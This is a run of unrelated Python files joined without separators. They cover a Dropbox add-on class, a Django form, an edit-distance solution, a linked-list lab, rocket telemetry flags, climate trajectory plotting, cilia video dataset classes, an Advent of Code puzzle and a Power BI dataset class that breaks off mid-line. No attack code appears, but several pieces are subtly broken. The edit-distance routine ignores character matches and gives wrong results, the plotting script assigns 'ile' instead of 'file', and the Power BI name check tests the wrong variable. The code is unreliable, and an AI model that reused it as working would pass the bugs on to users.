'addon': 'dropbox', 'id': '/', 'path': '/', 'kind': 'folder', 'name': '/ (Full Dropbox)', 'urls': { 'folders': api_v2_url('nodes/{}/addons/dropbox/folders/'.format(self.owner._id), params={'id': '/'} ) } }] client = Dropbox(self.external_account.oauth_key) try: folder_id = '' if folder_id == '/' else folder_id list_folder = client.files_list_folder(folder_id) contents = [x for x in list_folder.entries] while list_folder.has_more: list_folder = client.files_list_folder_continue(list_folder.cursor) contents += [x for x in list_folder.entries] except ApiError as error: raise HTTPError(http.BAD_REQUEST, data={ 'message_short': error.user_message_text, 'message_long': error.user_message_text, }) except DropboxException: raise HTTPError(http.BAD_REQUEST) return [ { 'addon': 'dropbox', 'kind': 'folder', 'id': item.path_display, 'name': item.path_display.split('/')[-1], 'path': item.path_display, 'urls': { 'folders': api_v2_url('nodes/{}/addons/dropbox/folders/'.format(self.owner._id), params={'id': item.path_display} ) } } for item in contents if isinstance(item, FolderMetadata) ] def set_folder(self, folder, auth): self.folder = folder # Add log to node self.nodelogger.log(action='folder_selected', save=True) def deauthorize(self, auth=None, add_log=True): """Remove user authorization from this node and log the event.""" folder = self.folder self.clear_settings() if add_log: extra = {'folder': folder} self.nodelogger.log(action='node_deauthorized', extra=extra, save=True) self.clear_auth() def serialize_waterbutler_credentials(self): if not self.has_auth: raise exceptions.AddonError('Addon is not authorized') return {'token': self.external_account.oauth_key} def serialize_waterbutler_settings(self): if not self.folder: raise exceptions.AddonError('Folder is not configured') return {'folder': self.folder} def create_waterbutler_log(self, auth, action, metadata): url = self.owner.web_url_for('addon_view_or_download_file', path=metadata['path'].strip('/'), provider='dropbox' ) self.owner.add_log( 'dropbox_{0}'.format(action), auth=auth, params={ 'project': self.owner.parent_id, 'node': self.owner._id, 'path': metadata['path'], 'folder': self.folder, 'urls': { 'view': url, 'download': url + '?action=download' }, }, ) def __repr__(self): return u''.format(self=self) ##### Callback overrides ##### def after_delete(self, node, user): self.deauthorize(Auth(user=user), add_log=True) self.save() def on_delete(self): self.deauthorize(add_log=False) self.save() from django import forms from .models import Driver class DriverForm(forms.ModelForm): class Meta: model = Driver fields = [ "first_name", "last_name", "birthday", ]class Solution: # @return an integer def minDistance(self, word1, word2): # Step 1: # Set n to be the length of word1; Set m to be the length of word2. # If n = 0, return m and exit. # If m = 0, return n and exit. # Construct a matrix containing 0...n rows and 0...m columns. # Step 2: # Initialize the first row to 0...n. # Initialize the first column to 0...m. # Step 3: # Examine each character of word1 (i from 1 to n). # Step 4: # Examine each character of word2 (j from 1 to m). # Step 5: # If word1[i] == word2[j], the cost = 0. # If word1[i] != word2[j], the cost = 1. # Step 6: # Set cell A [i, j] of the matrix equal to the minimum of: # a) The cell immediately above plus 1: A[i - 1, j] + 1. # b) The cell immediately to the left plus 1: A[i, j - 1] + 1. # c) The cell diagonally above and to the left plus the cost: A[i - 1, j - 1] + cost. # Step 7: # After the iteration steps (3, 4, 5, 6) are complete, the distance is found in cell A[n, m]. self.n = len(word1) self.m = len(word2) self.ar = {} for i in range(0,self.n+1): self.ar[i,0] = i for j in range(0,self.m+1): self.ar[0,j] = j # print self.ar for i in range(1,self.n+1): for j in range(1,self.m+1): l=word1[i-1] r=word2[j-1] # print i,j,l,r if l == r: self.cost = 0 else: self.cost=1 # print "diff"; # print self.cost,self.ar[i-1,j],self.ar[i-1,j-1],self.ar[i,j-1]; #self.ar[i,j]=min(min(self.ar[i,j-1]+1,self.ar[i-1,j]+1),self.ar[i-1,j-1]+self.cost) self.ar[i,j]=min(self.ar[i-1,j],self.ar[i-1,j-1],self.ar[i,j-1])+1 #print "VarLUE",self.ar[i,j],"COST",self.cost return self.ar[self.n,self.m] a=Solution() print "EDIT DISTANCE = ",a.minDistance('a','a')labs/lab08/lab08.py """ Lab 08: Midterm Review """ # Linked lists def deep_len(lnk): """ Returns the deep length of a possibly deep linked list. >>> deep_len(Link(1, Link(2, Link(3)))) 3 >>> deep_len(Link(Link(1, Link(2)), Link(3, Link(4)))) 4 >>> levels = Link(Link(Link(1, Link(2)), \ Link(3)), Link(Link(4), Link(5))) >>> print(levels) <<<1 2> 3> <4> 5> >>> deep_len(levels) 5 """ # Required lab questions are getting fewer and fewer.. # But you just have to do all the required ones :) if lnk.rest is Link.empty: return 1 if lnk is Link.empty: return 0 if isinstance(lnk.first, Link): return deep_len(lnk.first) + deep_len(lnk.rest) return 1 + deep_len(lnk.rest) # Link class class Link: """A linked list. >>> s = Link(1) >>> s.first 1 >>> s.rest is Link.empty True >>> s = Link(2, Link(3, Link(4))) >>> s.second 3 >>> s.first = 5 >>> s.second = 6 >>> s.rest.rest = Link.empty >>> s # Displays the contents of repr(s) Link(5, Link(6)) >>> s.rest = Link(7, Link(Link(8, Link(9)))) >>> s Link(5, Link(7, Link(Link(8, Link(9))))) >>> print(s) # Prints str(s) <5 7 <8 9>> """ empty = () def __init__(self, first, rest=empty): assert rest is Link.empty or isinstance(rest, Link) self.first = first self.rest = rest @property def second(self): return self.rest.first @second.setter def second(self, value): self.rest.first = value def __repr__(self): if self.rest is not Link.empty: rest_repr = ', ' + repr(self.rest) else: rest_repr = '' return 'Link(' + repr(self.first) + rest_repr + ')' def __str__(self): string = '<' while self.rest is not Link.empty: string += str(self.first) + ' ' self = self.rest return string + str(self.first) + '>'flag_lookup = [([0,0])] * 32 #assing list of 32 elements to represent 32 bits in flag string #list structure [flag level, flag name] flag_lookup[0] = ['state','USBMODE'] flag_lookup[1] = ['state','PREFLIGHT'] flag_lookup[2] = ['state','LAUNCH'] flag_lookup[3] = ['state','FLIGHT'] flag_lookup[4] = ['state','RECOVERY'] flag_lookup[5] = ['state','SETUP'] flag_lookup[6] = ['state','GROUNDSTATION'] flag_lookup[7] = ['info','DEBUG'] flag_lookup[8] = ['error','SPI'] flag_lookup[9] = ['error','I2C'] flag_lookup[10] = ['error','SERIAL'] flag_lookup[11] = ['error','LORA'] flag_lookup[12] = ['error','BARO'] flag_lookup[13] = ['error','BATT'] flag_lookup[14] = ['error','GPS'] flag_lookup[15] = ['error','IMU'] flag_lookup[16] = ['error','ESTIMATOR'] flag_lookup[17] = ['error','SD'] flag_lookup[18] = ['error','FLASH'] flag_lookup[19] = ['error','CAN'] flag_lookup[20] = ['error','ORIENTATION'] flag_lookup[21] = ['warn','BATT'] flag_lookup[22] = ['warn','PYRO1'] flag_lookup[23] = ['warn','PYRO2'] flag_lookup[24] = ['info','BOOST'] flag_lookup[25] = ['info','COAST'] flag_lookup[26] = ['info','APOGEE'] flag_lookup[27] = ['info','DROGUE CHUTE'] flag_lookup[28] = ['info','MAIN CHUTE'] #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Wed Jan 19 12:13:05 2022 @author: dboateng Replace many of the codes with function....I am keeping it since I was just trying the individual model outputs """ import sys sys.path.append("/home/dboateng/Python_scripts/TrajView") from package.traj import Tra from package.traj_plot import Mapfigure, CartoFigure import os import matplotlib.pyplot as plt import numpy as np import cartopy.crs as ccrs # User specifications main_path="/home/dboateng/source_codes/lagranto/new/" exp_name_AW100E100 = "a002" exp_name_AW100E0 = "a003" exp_name_AW100E200 = "a001" exp_name_AW200E100 = "a009" exp_name_AW200E0 = "a010" exp_name_AW200E200 = "t017" # loc_1 = "Bologna" # lat_1 = 44.49 # lon_1 = 11.38 # loc_1 = "Graz" # lat_1 = 47.06 # lon_1 = 15.44 loc_1 = "Munich" lat_1 = 48.14 lon_1 = 11.53 # loc_1 = "Lyon" # lat_1 = 45.81 # lon_1 = 4.82 varname = "p" AW100E100_path_june = os.path.join(main_path, exp_name_AW100E100, "June", "Trace", loc_1) AW100E100_path_july = os.path.join(main_path, exp_name_AW100E100, "July", "Trace", loc_1) AW100E100_path_august = os.path.join(main_path, exp_name_AW100E100, "August", "Trace", loc_1) AW100E0_path_june = os.path.join(main_path, exp_name_AW100E0, "June", "Trace", loc_1) AW100E0_path_july = os.path.join(main_path, exp_name_AW100E0, "July", "Trace", loc_1) AW100E0_path_august = os.path.join(main_path, exp_name_AW100E0, "August", "Trace", loc_1) AW100E200_path_june = os.path.join(main_path, exp_name_AW100E200, "June", "Trace", loc_1) AW100E200_path_july = os.path.join(main_path, exp_name_AW100E200, "July", "Trace", loc_1) AW100E200_path_august = os.path.join(main_path, exp_name_AW100E200, "August", "Trace", loc_1) AW200E100_path_june = os.path.join(main_path, exp_name_AW200E100, "June", "Trace", loc_1) AW200E100_path_july = os.path.join(main_path, exp_name_AW200E100, "July", "Trace", loc_1) AW200E100_path_august = os.path.join(main_path, exp_name_AW200E100, "August", "Trace", loc_1) AW200E0_path_june = os.path.join(main_path, exp_name_AW200E0, "June", "Trace", loc_1) AW200E0_path_july = os.path.join(main_path, exp_name_AW200E0, "July", "Trace", loc_1) AW200E0_path_august = os.path.join(main_path, exp_name_AW200E0, "August", "Trace", loc_1) AW200E200_path_june = os.path.join(main_path, exp_name_AW200E200, "June", "Trace", loc_1) AW200E200_path_july = os.path.join(main_path, exp_name_AW200E200, "July", "Trace", loc_1) AW200E200_path_august = os.path.join(main_path, exp_name_AW200E200, "August", "Trace", loc_1) files = ["wcb_1.1", "wcb_2.1", "wcb_3.1", "wcb_4.1", "wcb_5.1","wcb_6.1", "wcb_7.1", "wcb_8.1","wcb_9.1", "wcb_10.1"] # combining trajectories #AW100E100 file = os.path.join(AW100E100_path_june, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW100E100_path_june, i)) for i in files] AW100E100_June_Trajs = trajs.concatenate(trajs_add) file = os.path.join(AW100E100_path_july, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW100E100_path_july, i)) for i in files] AW100E100_July_Trajs = trajs.concatenate(trajs_add) file = os.path.join(AW100E100_path_august, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW100E100_path_august, i)) for i in files] AW100E100_August_Trajs = trajs.concatenate(trajs_add) #AW100E0 file = os.path.join(AW100E0_path_june, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW100E0_path_june, i)) for i in files] AW100E0_June_Trajs = trajs.concatenate(trajs_add) ile = os.path.join(AW100E0_path_july, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW100E0_path_july, i)) for i in files] AW100E0_July_Trajs = trajs.concatenate(trajs_add) file = os.path.join(AW100E0_path_august, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW100E0_path_august, i)) for i in files] AW100E0_August_Trajs = trajs.concatenate(trajs_add) #AW100E200 file = os.path.join(AW100E200_path_june, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW100E200_path_june, i)) for i in files] AW100E200_June_Trajs = trajs.concatenate(trajs_add) ile = os.path.join(AW100E200_path_july, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW100E200_path_july, i)) for i in files] AW100E200_July_Trajs = trajs.concatenate(trajs_add) file = os.path.join(AW100E200_path_august, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW100E200_path_august, i)) for i in files] AW100E200_August_Trajs = trajs.concatenate(trajs_add) #AW200E200 file = os.path.join(AW200E200_path_june, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW200E200_path_june, i)) for i in files] AW200E200_June_Trajs = trajs.concatenate(trajs_add) ile = os.path.join(AW200E200_path_july, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW200E200_path_july, i)) for i in files] AW200E200_July_Trajs = trajs.concatenate(trajs_add) file = os.path.join(AW200E200_path_august, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW200E200_path_august, i)) for i in files] AW200E200_August_Trajs = trajs.concatenate(trajs_add) #AW200E100 file = os.path.join(AW200E100_path_june, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW200E100_path_june, i)) for i in files] AW200E100_June_Trajs = trajs.concatenate(trajs_add) ile = os.path.join(AW200E100_path_july, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW200E100_path_july, i)) for i in files] AW200E100_July_Trajs = trajs.concatenate(trajs_add) file = os.path.join(AW200E100_path_august, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW200E100_path_august, i)) for i in files] AW200E100_August_Trajs = trajs.concatenate(trajs_add) #AW200E0 file = os.path.join(AW200E0_path_june, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW200E0_path_june, i)) for i in files] AW200E0_June_Trajs = trajs.concatenate(trajs_add) ile = os.path.join(AW200E0_path_july, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW200E0_path_july, i)) for i in files] AW200E0_July_Trajs = trajs.concatenate(trajs_add) file = os.path.join(AW200E0_path_august, files[0]) trajs = Tra(file) trajs_add = [Tra(os.path.join(AW200E0_path_august, i)) for i in files] AW200E0_August_Trajs = trajs.concatenate(trajs_add) # apply font and style from package.traj_plot import apply_style apply_style(fontsize=22, style=None, linewidth=2) path_to_store = os.path.join("/home/dboateng/Model_output_pst/", "plots") levels = np.linspace(700, 900, 22) cmap = "Spectral" projection = ccrs.PlateCarree() cbar_pos = [0.90, 0.30, 0.03, 0.45] # #AW100E100 fig, ((ax1,ax2),(ax3, ax4), (ax5,ax6)) = plt.subplots(nrows = 3, ncols = 2, figsize=(22,18), subplot_kw={"projection": projection}) cbar_ax = fig.add_axes(cbar_pos) # axis for subplot colorbar # left, bottom, width, height cbar_ax.get_xaxis().set_visible(False) cbar_ax.yaxis.set_ticks_position('right') cbar_ax.set_yticklabels([]) cbar_ax.tick_params(size=0) #CTL m = CartoFigure(ax=ax1, projection=projection, extent=[-38,20,30,65], resolution="50m", bottom_labels=False) ax1.scatter(lon_1, lat_1, marker=(5, 0), color=("black"),) p =m.plot_trajs(AW100E100_June_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW100E100_July_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW100E100_August_Trajs, variable=varname, levels=levels, cmap=cmap) ax1.set_title("[A] CTL", fontsize=22, weight="bold", loc="left") #W1E0 m = CartoFigure(ax=ax3, projection=projection, extent=[-38,20,30,65], resolution="50m", bottom_labels=False) ax3.scatter(lon_1, lat_1, marker=(5, 0), color=("black"),) p =m.plot_trajs(AW100E0_June_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW100E0_July_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW100E0_August_Trajs, variable=varname, levels=levels, cmap=cmap) ax3.set_title("[C] W1E0", fontsize=22, weight="bold", loc="left") #W1E2 m = CartoFigure(ax=ax5, projection=projection, extent=[-38,20,30,65], resolution="50m",) ax5.scatter(lon_1, lat_1, marker=(5, 0), color=("black"),) p =m.plot_trajs(AW100E200_June_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW100E200_July_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW100E200_August_Trajs, variable=varname, levels=levels, cmap=cmap) ax5.set_title("[E] W1E2", fontsize=22, weight="bold", loc="left") #W2E1 m = CartoFigure(ax=ax2, projection=projection, extent=[-38,20,30,65], resolution="50m", bottom_labels=False, left_labels=False) ax2.scatter(lon_1, lat_1, marker=(5, 0), color=("black"),) p =m.plot_trajs(AW200E100_June_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW200E100_July_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW200E100_August_Trajs, variable=varname, levels=levels, cmap=cmap) ax2.set_title("[B] W2E1", fontsize=22, weight="bold", loc="left") #W2E0 m = CartoFigure(ax=ax4, projection=projection, extent=[-38,20,30,65], resolution="50m", bottom_labels=False, left_labels=False) ax4.scatter(lon_1, lat_1, marker=(5, 0), color=("black"),) p =m.plot_trajs(AW200E0_June_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW200E0_July_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW200E0_August_Trajs, variable=varname, levels=levels, cmap=cmap) ax4.set_title("[D] W2E0", fontsize=22, weight="bold", loc="left") #W2E0 m = CartoFigure(ax=ax6, projection=projection, extent=[-38,20,30,65], resolution="50m", left_labels=False) ax6.scatter(lon_1, lat_1, marker=(5, 0), color=("black"),) p =m.plot_trajs(AW200E200_June_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW200E200_July_Trajs, variable=varname, levels=levels, cmap=cmap) m.plot_trajs(AW200E200_August_Trajs, variable=varname, levels=levels, cmap=cmap) ax6.set_title("[F] W2E2", fontsize=22, weight="bold", loc="left") cb = plt.colorbar(p, drawedges=True, pad=0.10, shrink= 0.30, format= "%.0f", extend= "both", cax=cbar_ax) cb.set_label("Pressure [hPa]", size=22, fontweight= "bold") #fig.canvas.draw() plt.tight_layout() plt.subplots_adjust(left=0.05, right=0.89, top=0.94, bottom=0.06) # plt.savefig(os.path.join(path_to_store, "figS11.svg"), format= "svg", bbox_inches="tight", dpi=300) # plt.savefig(os.path.join(path_to_store, "figS11.png"), format= "png", bbox_inches="tight", dpi=300) plt.savefig(os.path.join(path_to_store, "figS12.svg"), format= "svg", bbox_inches="tight", dpi=300) plt.savefig(os.path.join(path_to_store, "figS12.png"), format= "png", bbox_inches="tight", dpi=300) # plt.savefig(os.path.join(path_to_store, "fig8.svg"), format= "svg", bbox_inches="tight", dpi=300) # plt.savefig(os.path.join(path_to_store, "fig8.png"), format= "png", bbox_inches="tight", dpi=300) # plt.savefig(os.path.join(path_to_store, "fig9.svg"), format= "svg", bbox_inches="tight", dpi=300) # plt.savefig(os.path.join(path_to_store, "fig9.png"), format= "png", bbox_inches="tight", dpi=300) VTP/utils/Datasets.py from numpy import load, newaxis, sort, uint8 import os import time from torch.utils.data import Dataset ''' Cilia dataset with overlapping clips of fixed length @param source directory containing the source videos @param clipLength length of each clip to be constructed @param transform transform to be performed on observations @author ''' class overlapDataset(Dataset): def __init__(self, source, clipLength, transform=None): self.source = source self.videos = os.listdir(source) sort(self.videos) self.clipLength = clipLength self.videoLengths = [load(source + '/' + self.videos[n],mmap_mode='r').shape[0] - clipLength + 1 for n in range(len(self.videos))] self.transform = transform def __len__(self): return sum(self.videoLengths) def __getitem__(self, index): tempIndex = index currVideo = -1 while(tempIndex >= 0): currVideo += 1 tempIndex -= self.videoLengths[currVideo] tempIndex += self.videoLengths[currVideo] obs = load(self.source + '/' + self.videos[currVideo],mmap_mode='r+')[tempIndex:tempIndex+self.clipLength] if self.transform: obs = self.transform(obs) return obs ''' Cilia dataset with non-overlapping clips of fixed length @param source directory containing the source videos @param clipLength length of each clip to be constructed @param transform transform to be performed on observations @author ''' class nonOverlapDataset(Dataset): def __init__(self, source, clipLength, transform=None): self.source = source self.videos = os.listdir(source) sort(self.videos) self.clipLength = clipLength self.videoLengths = [load(source + '/' + self.videos[n],mmap_mode='r').shape[0] // clipLength for n in range(len(self.videos))] self.transform = transform def __len__(self): return sum(self.videoLengths) def __getitem__(self, index): tempIndex = index currVideo = -1 while(tempIndex >= 0): currVideo += 1 tempIndex -= self.videoLengths[currVideo] tempIndex += self.videoLengths[currVideo] obs = load(self.source + '/' + self.videos[currVideo],mmap_mode='r+')[(tempIndex*self.clipLength):(tempIndex*self.clipLength)+self.clipLength] if self.transform: obs = self.transform(obs) return obs ''' Cilia dataset split into individual frames @param source directory containing the source videos @param transform transform to be performed on observations @author ''' class frameDataset(Dataset): def __init__(self, source, transform=None): self.source = source self.videos = os.listdir(source) sort(self.videos) self.videoLengths = [load(source + self.videos[n],mmap_mode='r').shape[0] for n in range(len(self.videos))] self.transform = transform def __len__(self): return sum(self.videoLengths) def __getitem__(self, index): tempIndex = index currVideo = -1 while(tempIndex >= 0): currVideo += 1 tempIndex -= self.videoLengths[currVideo] tempIndex += self.videoLengths[currVideo] obs = load(self.source + self.videos[currVideo],mmap_mode='r+')[tempIndex, :, :, newaxis] if self.transform: obs = self.transform(obs) return obs ''' Cilia dataset split into non-overlapping mxn windows of individual frames @param source directory containing the source videos @param m the height of each window @param n the width of each window @param transform transform to be performed on observations @author ''' class nonOverlapWindowDataset(Dataset): def __init__(self, source, m, n, transform=None): self.source = source print('Beginning construction!') self.videos = os.listdir(source) print('Sorting') sort(self.videos) self.windowHeight = m self.windowWidth = n self.videoLengths = [] total=len(self.videos) for i in range(total): array = load(source + '/' + self.videos[i],mmap_mode='r') self.videoLengths.append(array.shape[0] * (array.shape[1]//m) * (array.shape[2]//n)) print('Loading array: ',i+1,'/',total) self.transform = transform def __len__(self): return sum(self.videoLengths) def __getitem__(self, index): tempIndex = index currVideo = -1 while(tempIndex >= 0): currVideo += 1 tempIndex -= self.videoLengths[currVideo] tempIndex += self.videoLengths[currVideo] array = load(self.source + '/' + self.videos[currVideo],mmap_mode='r+') horFrames = array.shape[2]//self.windowWidth frameSeparator = (array.shape[1]//self.windowHeight) * horFrames row = ((tempIndex % frameSeparator) // horFrames) * self.windowHeight col = (tempIndex % horFrames) * self.windowWidth obs = array[tempIndex // frameSeparator, row:(row+self.windowHeight), col:(col+self.windowWidth), newaxis].astype(uint8) if self.transform: obs = self.transform(obs) return obs ''' Cilia dataset split into overlapping mxn windows of individual frames @param source directory containing the source videos @param m the height of each window @param n the width of each window @param transform transform to be performed on observations @author ''' class overlapWindowDataset(Dataset): def __init__(self, source, m, n, transform=None): self.source = source self.videos = os.listdir(source) sort(self.videos) self.windowHeight = m self.windowWidth = n self.videoLengths = [] for i in range(len(self.videos)): array = load(source + '/' + self.videos[i],mmap_mode='r') self.videoLengths.append(array.shape[0] * (array.shape[1] - m + 1) * (array.shape[2] - n + 1)) self.transform = transform def __len__(self): return sum(self.videoLengths) def __getitem__(self, index): startTime = time.time() tempIndex = index currVideo = -1 while(tempIndex >= 0): currVideo += 1 tempIndex -= self.videoLengths[currVideo] tempIndex += self.videoLengths[currVideo] array = load(self.source + '/' + self.videos[currVideo],mmap_mode='r+') horFrames = array.shape[2] - self.windowWidth + 1 frameSeparator = (array.shape[1] - self.windowHeight + 1) * horFrames row = ((tempIndex % frameSeparator) // horFrames) col = tempIndex % horFrames obs = array[tempIndex // frameSeparator, row:(row+self.windowHeight), col:(col+self.windowWidth), newaxis].astype(uint8) if self.transform: obs = self.transform(obs) print("--- %s seconds ---" % (time.time() - startTime)) return obs ''' Cilia dataset split into non-overlapping clips of length clipLength and frame-size mxn @param source directory containing the source videos @param clipLength duration of a clip @param m the height of each window @param n the width of each window @param transform transform to be performed on observations @author ''' class nonOverlapClipDataset(Dataset): def __init__(self, source, clipLength, m, n, transform=None): self.source = source self.videos = os.listdir(source) sort(self.videos) self.clipLength = clipLength self.windowHeight = m self.windowWidth = n self.videoLengths = [] for i in range(len(self.videos)): array = load(source + '/' + self.videos[i], mmap_mode='r') self.videoLengths.append((array.shape[0] // self.clipLength) * (array.shape[1] // m) * (array.shape[2] // n)) self.transform = transform def __len__(self): return sum(self.videoLengths) def __getitem__(self, index): tempIndex = index currVideo = -1 while(tempIndex >= 0): currVideo += 1 tempIndex -= self.videoLengths[currVideo] tempIndex += self.videoLengths[currVideo] array = load(self.source + '/' + self.videos[currVideo], mmap_mode='r+') horFrames = array.shape[2]//self.windowWidth frameSeparator = (array.shape[1]//self.windowHeight) * horFrames row = ((tempIndex % frameSeparator) // horFrames) * self.windowHeight col = (tempIndex % horFrames) * self.windowWidth time = (tempIndex // frameSeparator) * self.clipLength obs = array[time:(time+self.clipLength), row:(row+self.windowHeight), col:(col+self.windowWidth)] if self.transform: obs = self.transform(obs) return obs ''' Cilia dataset split into overlapping clips of length clipLength and frame-size mxn @param source directory containing the source videos @param clipLength duration of a clip @param m the height of each window @param n the width of each window @param transform transform to be performed on observations @author ''' class overlapClipDataset(Dataset): def __init__(self, source, clipLength, m, n, transform=None): self.source = source self.videos = os.listdir(source) sort(self.videos) self.clipLength = clipLength self.windowHeight = m self.windowWidth = n self.videoLengths = [] for i in range(len(self.videos)): array = load(source + '/' + self.videos[i],mmap_mode='r') self.videoLengths.append((array.shape[0] - clipLength + 1) * (array.shape[1] - m + 1) * (array.shape[2] - n + 1)) self.transform = transform def __len__(self): return sum(self.videoLengths) def __getitem__(self, index): tempIndex = index currVideo = -1 while(tempIndex >= 0): currVideo += 1 tempIndex -= self.videoLengths[currVideo] tempIndex += self.videoLengths[currVideo] array = load(self.source + '/' + self.videos[currVideo],mmap_mode='r+') horFrames = array.shape[2] - self.windowWidth + 1 frameSeparator = (array.shape[1] - self.windowHeight + 1) * horFrames row = ((tempIndex % frameSeparator) // horFrames) col = tempIndex % horFrames time = (tempIndex // frameSeparator) obs = array[time:(time+self.clipLength), row:(row+self.windowHeight), col:(col+self.windowWidth)] if self.transform: obs = self.transform(obs) return obscodingSince9/Advent-of-Code-2020 entries = [] with open("day01/day01.txt", "r") as f: for entry in f: entries.append(int(entry)) foundSumOf2 = False foundSumOf3 = False for entry in entries: for entry2 in entries: if entry + entry2 == 2020 and not foundSumOf2: print(entry * entry2) foundSumOf2 = True for entry3 in entries: if entry + entry2 + entry3 == 2020 and not foundSumOf3: print(entry * entry2 * entry3) foundSumOf3 = True if foundSumOf3: break if foundSumOf2: break if foundSumOf2 and foundSumOf3: breakSRG.py import sys, os, glob from SRGController import SRGController from SRGConsoleView import SRGConsoleView def main(): """ Main Entry point to program Should be run in a new thread. For linux use 'SRG.py start &' """ #full path for any session.loc files #session.lock files are what keep the background threads running #removing a session.lock file with terminate the background thread loop #session.lock files are in the format session-{sessionId}.lock session_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "session-*") if 'start' in sys.argv: #Can only have one session running at a time #remove any other session.lock files present to close #the old threads for filename in glob.glob(session_path): print("Shutting down open SRG background process ...") #delete the session.lock file which will stop the loop os.remove(filename) #create the view and controller view = SRGConsoleView() controller = SRGController(view) #Start the main loop controller.start() elif 'stop' in sys.argv: #delete the session.lock file which will stop the loop sessions = glob.glob(session_path) #delete all session files if len(sessions) > 0: print("Shutting down SRG background process ...") for filename in sessions: os.remove(filename) else: print("No SRG sessions running.") else: print("GUI not currently supported.\nRun 'SRG.py start' to start the background process or 'SRG.py stop' to stop the process.") if __name__ == '__main__': main()pypowerbi/dataset.py # -*- coding: future_fstrings -*- import json class Dataset: # json keys id_key = 'id' name_key = 'name' add_rows_api_enabled_key = 'addRowsAPIEnabled' configured_by_key = 'configuredBy' is_refreshable_key = 'isRefreshable' is_effective_identity_required_key = 'isEffectiveIdentityRequired' is_effective_identity_roles_required_key = 'isEffectiveIdentityRolesRequired' is_on_prem_gateway_required_key = 'isOnPremGatewayRequired' tables_key = 'tables' def __init__(self, name, dataset_id=None, tables=None, add_rows_api_enabled=None, configured_by=None, is_refreshable=None, is_effective_identity_required=None, is_effective_identity_roles_required=None, is_on_prem_gateway_required=None): self.name = name self.id = dataset_id self.tables = tables self.add_rows_api_enabled = add_rows_api_enabled self.configured_by = configured_by self.is_refreshable = is_refreshable self.is_effective_identity_required = is_effective_identity_required self.is_effective_identity_roles_required = is_effective_identity_roles_required self.is_on_prem_gateway_required = is_on_prem_gateway_required @classmethod def from_dict(cls, dictionary): """ Creates a dataset from a dictionary, key values for 'id' and 'name' required :param dictionary: The dictionary to create the dataset from :return: A dataset created from the given dictionary """ # id is required if Dataset.id_key in dictionary: dataset_id = str(dictionary[Dataset.id_key]) # id cannot be whitespace if dataset_id.isspace(): raise RuntimeError('Dataset dict has empty id key value') else: raise RuntimeError('Dataset dict has no id key') # name is required if Dataset.name_key in dictionary: dataset_name = str(dictionary[Dataset.name_key]) # name cannot be whitespace if dataset_id.isspace(): raise RuntimeError('Dataset dict has empty name key value') else: raise RuntimeError('Dataset dict has no name key') # add api enabled is optional if Dataset.add_rows_api_enabled_key in dictionary: add_rows_api_enabled = bool(dictionary[Dataset.add_rows_api_enabled_key]) else: add_rows_api_enabled = None # configured by is optional if Dataset.configured_by_key in dictionary: configured_by = str(dictionary[Dataset.configured_by_key]) else: configured_by = None # is refreshable is optional if Dataset.is_refreshable_key in dictionary: is_refreshable = bool(dictionary[Dataset.is_refreshable_key]) else: is_refreshable = None # is effective identity required is optional if Dataset.is_effective_identity_required_key in dictionary: is_effective_identity_required = bool(dictionary[Dataset.is_effective_identity_required_key]) else: is_effective_identity_required = None # is effective identity roles required is optional if Dataset.is_effective_identity_roles_required_key in dictionary: is_effective_identity_roles_required = bool(dictionary[Dataset.is_effective_identity_roles_required_key]) else: is_effective_identity_roles_required = None # is on prem gateway required is optional if Dataset.is_on_prem_gateway_required_key in dictionary: is_on_prem_gateway_required = bool(dictionary[Dataset.is_on_prem_gateway_required_key]) else: is_on_prem_gateway_required = None return Dataset(dataset_name, dataset_id, add_rows_api_enabled=add_rows_api_enabled, configured_by=configured_by, is_refreshable=is_refreshable, is_effective_identity_required=is_effective_identity_required, is_effective_identity_roles_required=is_effective_identity_roles_required, is_on_prem_gateway_required=is_on_prem_gateway_required) class DatasetEncoder(json.JSONEncoder): def default(self, o): table_encoder = TableEncoder() json_dict = { Dataset.name_key: o.name, Dataset.tables_key: [table_encoder.default(x) for x in o.tables], } return json_dict class Table: name_key = 'name' columns_key = 'columns' measures_key = 'measures' @classmethod def from_dict(cls, dictionary): """ Creates a table from a dictionary, 'name' key value required :param dictionary: The dictionary to create the table from :return: A table created from the dictionary """ # name is required if Table.name_key in dictionary: table_name = str(dictionary[Table.name_key]) # name cannot be whitespace if table_name.isspace(): raise RuntimeError('Table dict has empty name key value') else: raise RuntimeError('Table dict has no name key') # measures are optional if Table.measures_key in dictionary: table_measures = [Table.from_dict(x) for x in dictionary[Table.measures_key]] else: table_measures = None return Table(name=table_name, measures=table_measures) def __init__(self, name, columns=None, measures=None): self.name = name self.columns = columns self.measures = measures class TableEncoder(json.JSONEncoder): def default(self, o): json_dict = { Table.name_key: o.name, } if o.columns is not None: column_encoder = 